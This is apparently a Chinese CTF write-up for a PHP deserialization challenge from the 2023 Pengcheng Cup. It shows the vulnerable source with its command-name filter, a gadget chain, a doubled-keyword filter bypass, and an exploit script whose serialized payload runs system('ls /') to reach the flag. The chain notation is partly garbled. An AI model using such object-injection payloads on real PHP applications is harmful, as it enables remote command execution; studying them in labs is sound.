2023鹏城杯web1-php反序列化
源码:
<?php
show_source(__FILE__);
error_reporting(0);
class Hacker{
private $exp;
private $cmd;
public function __toString()
{
call_user_func('system', "cat /flag");
}
}
class A
{
public $hacker;
public function __toString()
{
echo $this->hacker->name;
return "";
}
}
class C
{
public $finish;
public function __get($value)
{
$this->finish->hacker();
echo 'nonono';
}
}
class E
{
public $hacker;
public function __invoke($parms1)
{
echo $parms1;
$this->hacker->welcome();
}
}
class H
{
public $username="admin";
public function __destruct()
{
$this->welcome();
}
public function welcome()
{
echo "welcome~ ".$this->username;
}
}
class K
{
public $func;
public function __call($method,$args)
{
call_user_func($this->func,'welcome');
}
}
class R
{
public $method;
public $args;
public function welcome()
{
if ($this->key === true && $this->finish1->name) {
if ($this->finish->finish) {
echo "okkkk";
call_user_func_array($this->method,$this->args);
}
}
}
}
function nonono($a){
$filter = "/system|exec|passthru|shell_exec|popen|proc_open|pcntl_exec|system|eval|flag/i";
return preg_replace($filter,'',$a);
}
pop链:
R : : w e l c o m e − > E : : i n v o k e − > k : : c a l l − > c : : g e t − > A : : t o s t r i n g R::welcome->E::invoke->k::call->c::get->A::tostring R::welcome−>E::invoke−>k::call−>c::get−>A::tostring
绕过正则(双写扰过)
$filter = "/system|exec|passthru|shell_exec|popen|proc_open|pcntl_exec|system|eval|flag/i";
preg_replace($filter,'',$a);
改变长度:s:6:"syssystemtem"原本为12改为6
exp
<?php
show_source(__FILE__);
error_reporting(0);
class Hacker{
private $exp;
private $cmd;
public function __toString()
{
call_user_func('system', "cat /flag");
}
}
class A
{
public $hacker;
public function __toString()
{
echo $this->hacker->name;
return "";
}
}
class C
{
public $finish;
public function __get($value)
{
$this->finish->hacker();
echo 'nonono';
}
}
class E
{
public $hacker;
public function __invoke($parms1)
{
echo $parms1;
$this->hacker->welcome();
}
}
class H
{
public $username="admin";
public function __destruct()
{
$this->welcome();
}
public function welcome()
{
echo "welcome~ ".$this->username;
}
}
class K
{
public $func;
public function __call($method,$args)
{
call_user_func($this->func,'welcome');
}
}
class R
{
public $method='syssystemtem';
public $args=['cat /flflagag'];
public function welcome()
{
if ($this->key === true && $this->finish1->name) {
if ($this->finish->finish) {
echo "okkkk";
call_user_func_array($this->method,$this->args);
}
}
}
}
function nonono($a){
$filter = "/system|exec|passthru|shell_exec|popen|proc_open|pcntl_exec|system|eval|flag/i";
return preg_replace($filter,'',$a);
}
$a=new H();
$a->username=new A();
$a->username->hacker=new C();
$a->username->hacker->finish=new K();
$a->username->hacker->finish->func=new E();
$a->username->hacker->finish->func->hacker=new R();
$a->username->hacker->finish->func->hacker->key=true;
$a->username->hacker->finish->func->hacker->finish1->name=true;
$a->username->hacker->finish->func->hacker->finish->finish=true;
echo serialize($a);
//O:1:"H":1:{s:8:"username";O:1:"A":1:{s:6:"hacker";O:1:"C":1:{s:6:"finish";O:1:"K":1:{s:4:"func";O:1:"E":1:{s:6:"hacker";O:1:"R":5:{s:6:"method";s:12:"syssystemtem";s:4:"args";a:1:{i:0;s:4:"ls /";}s:3:"key";b:1;s:7:"finish1";O:8:"stdClass":1:{s:4:"name";b:1;}s:6:"finish";O:8:"stdClass":1:{s:6:"finish";b:1;}}}}}}}
$b='O:1:"H":1:{s:8:"username";O:1:"A":1:{s:6:"hacker";O:1:"C":1:{s:6:"finish";O:1:"K":1:{s:4:"func";O:1:"E":1:{s:6:"hacker";O:1:"R":5:{s:6:"method";s:6:"syssystemtem";s:4:"args";a:1:{i:0;s:4:"ls /";}s:3:"key";b:1;s:7:"finish1";O:8:"stdClass":1:{s:4:"name";b:1;}s:6:"finish";O:8:"stdClass":1:{s:6:"finish";b:1;}}}}}}}';
unserialize(nonono($b));
echo "\n";
echo urlencode($b);
977
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
